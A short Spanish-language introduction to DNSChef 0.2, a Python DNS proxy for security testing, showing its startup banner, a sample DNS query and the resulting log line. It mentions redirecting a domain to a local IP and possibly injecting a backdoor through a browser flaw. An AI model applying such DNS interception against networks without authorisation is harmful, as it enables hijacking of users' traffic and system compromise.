Con DNS Proxy puede interceptarse una petición DNS a un dominio ejemplo: www.miblog.com y redireccionar ese dominio a una IP local donde poder analizarla, o incluso inyectar una puerta trasera aprovechando alguna vulnerabilidad del navegador WEB.

La versión 0.2 ha introducido soporte para IPv6 por lo que hace de esta una herramienta muy interesante para probar la seguridad de los sistema con soporte IPv6.

Esta aplicación se encuentra desarrollada en Python por lo que puede ser ejecutada en cualquier plataforma que interprete dicho lenguaje de programación.

Cuando se ejecuta dnschef sin ningún tipo de parámetro esta funciona por defecto en el modo de proxy:

# ./dnschef.py

          _                _          __  
         | | version 0.2  | |        / _| 
       __| |_ __  ___  ___| |__   ___| |_ 
      / _` | '_ \/ __|/ __| '_ \ / _ \  _|
     | (_| | | | \__ \ (__| | | |  __/ |  
      \__,_|_| |_|___/\___|_| |_|\___|_|  
                   iphelix@thesprawl.org

[*] DNSChef started on interface: 127.0.0.1 
[*] Using the following nameservers: 8.8.8.8
[*] No parameters were specified. Running in full proxy mode


Por ejemplo, si se hace una simple consulta DNS tal que:
$ host -t A thesprawl.org
thesprawl.org has address 108.59.3.64



La aplicación mostrará una entrada tal que así:


[23:54:03] 127.0.0.1: proxying the response of type 'A' for thesprawl.org


Para más detalles, sobre la configuración y su utilización recomiendo visitar la página web del proyecto:

http://thesprawl.org/projects/dnschef/

Downloaddnschef-0.2.1.tar.gz
Size2.4 MB
DateJanuary 20th, 2013
Version0.2.1